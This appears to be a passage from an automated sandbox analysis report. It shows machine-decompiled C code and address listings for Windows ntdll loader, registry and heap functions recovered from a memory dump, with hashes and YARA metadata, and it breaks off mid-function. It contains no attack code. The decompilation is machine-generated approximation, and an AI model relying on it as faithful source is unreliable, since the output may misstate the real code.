                        0x02b08834
                        0x02b08837
                        0x00000000
                        0x00000000
                        0x02b08837
                        0x02b0882e
                        0x02b0883d
                        0x02b08840
                        0x02b08843
                        0x02b08846
                        0x02b08849
                        0x02b0884c
                        0x02b0884e
                        0x02b08850
                        0x02b08852
                        0x02b08854
                        0x02b08857
                        0x02b088b4
                        0x02b088b6
                        0x02b088b6
                        0x02b08859
                        0x02b08859
                        0x02b08859
                        0x02b08861
                        0x02b08866
                        0x02b0886a
                        0x02b0893d
                        0x02b08941
                        0x00000000
                        0x02b08947
                        0x02b08947
                        0x02b0894a
                        0x02b0894c
                        0x00000000
                        0x02b08952
                        0x02b08955
                        0x02b0895a
                        0x02b0895d
                        0x02b0895d
                        0x02b0895f
                        0x02b08961
                        0x02b08961
                        0x02b08968
                        0x00000000
                        0x00000000
                        0x02b0896a
                        0x02b0896b
                        0x02b0896e
                        0x00000000
                        0x02b08970
                        0x02b08970
                        0x02b08970
                        0x02b08970
                        0x02b08972
                        0x02b08972
                        0x02b08974
                        0x00000000
                        0x02b0897a
                        0x02b0897a
                        0x02b0897d
                        0x00000000
                        0x02b08983
                        0x02b59c65
                        0x02b59c6d
                        0x02b59c72
                        0x02b59c75
                        0x02b59c75
                        0x02b59c82
                        0x02b59c86
                        0x02b59c87
                        0x02b59c88
                        0x02b59c89
                        0x02b59c8c
                        0x02b59c90
                        0x02b59c95
                        0x02b59c97
                        0x02b59ca0
                        0x02b59ca3
                        0x02b59ca9
                        0x02b59ca9
                        0x00000000
                        0x02b59ca9
                        0x02b59ca3
                        0x00000000
                        0x02b59c97
                        0x02b0897d
                        0x00000000
                        0x02b08974
                        0x02b08988
                        0x02b08992
                        0x02b08996
                        0x00000000
                        0x02b08996
                        0x02b0894c
                        0x00000000
                        0x02b08870
                        0x02b0887b
                        0x02b0887d
                        0x02b0887f
                        0x02b08881
                        0x02b08884
                        0x02b08884
                        0x02b08886
                        0x02b08889
                        0x02b0888c
                        0x02b0888e
                        0x02b08891
                        0x02b08891
                        0x02b08898
                        0x00000000
                        0x00000000
                        0x02b0889a
                        0x02b0889b
                        0x02b0889e
                        0x00000000
                        0x00000000
                        0x02b088a0
                        0x02b088a8
                        0x02b088b0
                        0x02b088b2
                        0x02b088d3
                        0x02b088d5
                        0x00000000
                        0x02b088d7
                        0x02b088db
                        0x02b088dc
                        0x02b088e0
                        0x02b088e8
                        0x02b088ee
                        0x02b088f0
                        0x02b088f3
                        0x02b088fc
                        0x02b08901
                        0x02b08906
                        0x02b0890c
                        0x02b0890c
                        0x02b0890f
                        0x02b08916
                        0x02b08917
                        0x02b08918
                        0x02b08919
                        0x02b0891a
                        0x02b0891f
                        0x02b08921
                        0x02b59c52
                        0x02b59c55
                        0x02b59c5b
                        0x02b59cac
                        0x02b59cc0
                        0x02b59cc0
                        0x02b59c55
                        0x02b08927
                        0x02b08927
                        0x02b0892f
                        0x02b08933
                        0x00000000
                        0x02b088f5
                        0x02b088f5
                        0x00000000
                        0x02b088f7
                        0x02b088f7
                        0x02b088fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b088fa
                        0x02b088f5
                        0x02b088f3
                        0x00000000
                        0x02b088d5
                        0x00000000
                        0x02b088b2
                        0x02b088c9
                        0x00000000
                        0x02b088c9
                        0x02b0887f
                        0x02b0886a
                        0x02b08857
                        0x02b08852
                        0x02b088bf
                        0x02b088bf
                        0x02b087aa
                        0x02b087ad
                        0x02b087ae
                        0x02b087b4
                        0x02b087b5
                        0x02b087b6
                        0x02b087b8
                        0x02b087bd
                        0x02b087c1
                        0x02b087f4
                        0x02b087fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b087c1
                        0x00000000

                        Strings
                        • LdrpDoPostSnapWork, xrefs: 02B59C1E
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02B59C18
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02B59C28
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-1948996284
                        • Opcode ID: c5eec6b06e8d47dff613a86798cb0239159dddc315c76fa0851cbc16b329766f
                        • Instruction ID: bbe69fe17fa04d87f16cefe53e70c335eca1fd6829f94b08f09949221af1b2b0
                        • Opcode Fuzzy Hash: c5eec6b06e8d47dff613a86798cb0239159dddc315c76fa0851cbc16b329766f
                        • Instruction Fuzzy Hash: 5D91D271A00715EBEF1ADF58C4C1ABA7BB6FF44318B5441E9D905AB291DB30FA01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B07E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E02B07E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E02B0CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E02AFC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x2be5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E02B75510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x2be5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E02B17D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02B17D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E02B77016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E02B17D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02B17D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E02B77016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E02B2A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E02AFB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                        0x02b07e4c
                        0x02b07e50
                        0x02b07e55
                        0x02b07e58
                        0x02b07e5d
                        0x02b07e71
                        0x02b07f33
                        0x02b07e77
                        0x02b07e77
                        0x02b07e79
                        0x02b07e79
                        0x02b07e7e
                        0x02b07f45
                        0x02b59848
                        0x00000000
                        0x02b59848
                        0x02b07f4e
                        0x02b07f53
                        0x02b07f5a
                        0x00000000
                        0x00000000
                        0x02b5985a
                        0x02b59862
                        0x02b59866
                        0x00000000
                        0x02b5986c
                        0x00000000
                        0x02b5986c
                        0x02b07e84
                        0x02b07e84
                        0x02b07e8d
                        0x02b59871
                        0x02b07eb8
                        0x02b07ec0
                        0x02b07ec0
                        0x02b07e9a
                        0x02b5987e
                        0x00000000
                        0x00000000
                        0x02b59884
                        0x02b5988b
                        0x02b598a7
                        0x02b598ac
                        0x02b598b1
                        0x02b598b6
                        0x02b598b8
                        0x02b598b8
                        0x02b598b9
                        0x00000000
                        0x02b598b9
                        0x02b07ea0
                        0x02b07ea7
                        0x00000000
                        0x00000000
                        0x02b07eac
                        0x02b07eb1
                        0x02b07ec6
                        0x02b07ed0
                        0x02b598cc
                        0x02b07ed6
                        0x02b07ed6
                        0x02b07ed6
                        0x02b07ede
                        0x02b07ee3
                        0x02b598e3
                        0x02b598f0
                        0x02b59902
                        0x02b598f2
                        0x02b598fb
                        0x02b598fb
                        0x02b59907
                        0x02b5991d
                        0x02b5991d
                        0x02b59907
                        0x02b598e3
                        0x02b07ef0
                        0x02b07f14
                        0x02b07f14
                        0x02b07f1e
                        0x02b59946
                        0x02b07f24
                        0x02b07f24
                        0x02b07f24
                        0x02b07f2c
                        0x02b5996a
                        0x02b59975
                        0x02b59975
                        0x02b5997e
                        0x02b59993
                        0x02b59993
                        0x02b5997e
                        0x00000000
                        0x02b07ef2
                        0x02b07efc
                        0x02b07f0a
                        0x02b07f0e
                        0x02b59933
                        0x00000000
                        0x02b59933
                        0x00000000
                        0x02b07f0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b07eb1

                        Strings
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 02B59891
                        • LdrpCompleteMapModule, xrefs: 02B59898
                        • minkernel\ntdll\ldrmap.c, xrefs: 02B598A2
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: 33f727b8e7cf18d230f8348dc19eb9567424416fef52475cba03cf47eaf4d32e
                        • Instruction ID: fccadb4ad2a3b6c7b1a9191d6c196fd15f08c8ccbee5cbcd19824b0acc204813
                        • Opcode Fuzzy Hash: 33f727b8e7cf18d230f8348dc19eb9567424416fef52475cba03cf47eaf4d32e
                        • Instruction Fuzzy Hash: 1151E131601B85DBEB22CB58C984B2AFBA9EB01358F1405D9E9529F7D1DB74FD00DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E02AFE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E02AFF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E02B395D0();
						}
						if(_t78 != 0) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E02B3FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E02B3BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E02B39600();
					if(_t97 < 0) {
						goto L6;
					}
					E02B3BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L02AFF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E02B3BB40(_t83, _t102 + 0x24, _t78);
								if(L02B043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E02B3BB40(_t84, _t102 + 0x24, _t94);
									if(L02B043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                        0x02afe620
                        0x02afe628
                        0x02afe62f
                        0x02afe631
                        0x02afe635
                        0x02afe637
                        0x02afe63e
                        0x02b55503
                        0x02b55503
                        0x02afe64c
                        0x02afe64c
                        0x02afe651
                        0x00000000
                        0x00000000
                        0x02afe661
                        0x02afe665
                        0x02b5542a
                        0x02afe715
                        0x02afe71a
                        0x02afe71c
                        0x02afe720
                        0x02afe720
                        0x02afe727
                        0x02afe736
                        0x02afe736
                        0x02afe743
                        0x02afe743
                        0x02afe673
                        0x02afe678
                        0x02afe67d
                        0x02afe682
                        0x02afe685
                        0x02afe692
                        0x02afe69b
                        0x02afe6a3
                        0x02afe6ad
                        0x02afe6b1
                        0x02afe6b2
                        0x02afe6bb
                        0x02afe6bf
                        0x02afe6c0
                        0x02afe6c8
                        0x02afe6cc
                        0x02afe6d5
                        0x02afe6d9
                        0x00000000
                        0x00000000
                        0x02afe6e5
                        0x02afe6ea
                        0x02afe6f9
                        0x02afe70b
                        0x02afe70f
                        0x02b55439
                        0x02b5545e
                        0x02b5545e
                        0x00000000
                        0x02b5545e
                        0x02b5543b
                        0x02b5543e
                        0x02b55440
                        0x02b55445
                        0x02b55472
                        0x02b55475
                        0x02b5548d
                        0x02b55493
                        0x02b554a9
                        0x00000000
                        0x00000000
                        0x02b554ab
                        0x02b554b4
                        0x02b554bc
                        0x02b554c8
                        0x02b554de
                        0x02b554fb
                        0x02b554e0
                        0x02b554e6
                        0x02b554eb
                        0x02b554eb
                        0x02b554de
                        0x00000000
                        0x02b554bc
                        0x02b55477
                        0x02b5547a
                        0x02b55480
                        0x02b55483
                        0x02b55486
                        0x02b5548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b5548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b55447
                        0x02b55447
                        0x02b55447
                        0x02b55447
                        0x02b5544e
                        0x00000000
                        0x00000000
                        0x02b55450
                        0x02b55452
                        0x02b55455
                        0x02b5545a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b5545c
                        0x02b5546a
                        0x02b5546d
                        0x02b5546f
                        0x00000000
                        0x02b5546f
                        0x02afe70f

                        Strings
                        • InstallLanguageFallback, xrefs: 02AFE6DB
                        • @, xrefs: 02AFE6C0
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02AFE68C
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: 96b600fcae01c0dfcd980f9216998e3bc84b8b919938575e7228e6f4e96d0fca
                        • Instruction ID: 4734b0e6796434dd25682dd24626e772d4932cc8509ed6b6e0b547a077f647db
                        • Opcode Fuzzy Hash: 96b600fcae01c0dfcd980f9216998e3bc84b8b919938575e7228e6f4e96d0fca
                        • Instruction Fuzzy Hash: 8351B1725043559BC725DF64C440BABB3E8EF88715F4509AEFA85EB250FB34D904CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BBE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E02BBE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E02BBBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E02BBBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E02BBAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E02B39730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E02BBA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E02BBA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E02B39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E02BBA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E02BBA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E02B12280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E02B0B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E02B0FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E02B17D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E02BAFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                        0x02bbe547
                        0x02bbe549
                        0x02bbe54f
                        0x02bbe553
                        0x02bbe557
                        0x02bbe55a
                        0x02bbe55c
                        0x02bbe55f
                        0x02bbe561
                        0x02bbe567
                        0x02bbe56b
                        0x02bbe7e2
                        0x00000000
                        0x02bbe571
                        0x02bbe575
                        0x02bbe577
                        0x02bbe57b
                        0x02bbe57c
                        0x02bbe57d
                        0x02bbe57e
                        0x02bbe57f
                        0x02bbe588
                        0x02bbe58f
                        0x02bbe591
                        0x02bbe592
                        0x02bbe592
                        0x02bbe596
                        0x02bbe59e
                        0x02bbe5a0
                        0x02bbe5a6
                        0x02bbe61d
                        0x02bbe61d
                        0x02bbe621
                        0x02bbe623
                        0x02bbe630
                        0x02bbe630
                        0x02bbe7e6
                        0x02bbe7eb
                        0x02bbe7ed
                        0x02bbe7f4
                        0x02bbe7fa
                        0x02bbe7ff
                        0x02bbe7ff
                        0x02bbe80a
                        0x02bbe812
                        0x02bbe812
                        0x02bbe5ab
                        0x02bbe5b4
                        0x02bbe5b9
                        0x02bbe5be
                        0x02bbe5c0
                        0x02bbe5c2
                        0x02bbe5c8
                        0x02bbe5c9
                        0x02bbe5cb
                        0x02bbe5cc
                        0x02bbe5d5
                        0x02bbe5e4
                        0x02bbe5f1
                        0x02bbe5f8
                        0x02bbe5f8
                        0x02bbe5d5
                        0x02bbe602
                        0x02bbe616
                        0x02bbe63d
                        0x02bbe644
                        0x02bbe64d
                        0x02bbe652
                        0x02bbe657
                        0x02bbe659
                        0x02bbe65b
                        0x02bbe661
                        0x02bbe662
                        0x02bbe664
                        0x02bbe665
                        0x02bbe66e
                        0x02bbe67d
                        0x02bbe68a
                        0x02bbe691
                        0x02bbe691
                        0x02bbe66e
                        0x02bbe6b0
                        0x00000000
                        0x02bbe6b6
                        0x02bbe6bd
                        0x02bbe6c7
                        0x02bbe6d7
                        0x02bbe6d9
                        0x02bbe6db
                        0x02bbe6de
                        0x02bbe6e3
                        0x02bbe6f3
                        0x02bbe6fc
                        0x02bbe700
                        0x02bbe700
                        0x02bbe704
                        0x02bbe70a
                        0x02bbe70a
                        0x02bbe713
                        0x02bbe716
                        0x02bbe719
                        0x02bbe720
                        0x02bbe761
                        0x02bbe76b
                        0x02bbe774
                        0x02bbe77a
                        0x02bbe77a
                        0x02bbe78a
                        0x02bbe791
                        0x02bbe799
                        0x02bbe79b
                        0x02bbe79f
                        0x02bbe7aa
                        0x02bbe7c0
                        0x02bbe7ac
                        0x02bbe7b2
                        0x02bbe7b9
                        0x02bbe7b9
                        0x02bbe7c7
                        0x02bbe806
                        0x00000000
                        0x02bbe7c9
                        0x02bbe7d1
                        0x02bbe7d8
                        0x00000000
                        0x02bbe7d8
                        0x00000000
                        0x00000000
                        0x02bbe722
                        0x02bbe72e
                        0x02bbe748
                        0x02bbe74c
                        0x02bbe754
                        0x02bbe756
                        0x02bbe75c
                        0x02bbe75c
                        0x00000000
                        0x02bbe75c
                        0x02bbe758
                        0x02bbe758
                        0x00000000
                        0x02bbe758
                        0x02bbe750
                        0x00000000
                        0x00000000
                        0x02bbe752
                        0x00000000
                        0x02bbe752
                        0x02bbe730
                        0x02bbe735
                        0x02bbe73d
                        0x02bbe73f
                        0x00000000
                        0x00000000
                        0x02bbe741
                        0x02bbe741
                        0x00000000
                        0x02bbe741
                        0x02bbe739
                        0x00000000
                        0x00000000
                        0x02bbe73b
                        0x00000000
                        0x02bbe73b
                        0x02bbe722
                        0x02bbe720
                        0x02bbe6b0
                        0x02bbe618
                        0x00000000
                        0x02bbe618

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: 6930f473490dedb942da88ec9b71cc2b860a34497508097816b80ccb6bb28e58
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: E491C4312043419FE726CE25C841BABB7E6FF84714F5489ADFA95CB690D7B4E804CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B751BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E02B751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x2bd05f0);
				E02B4D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
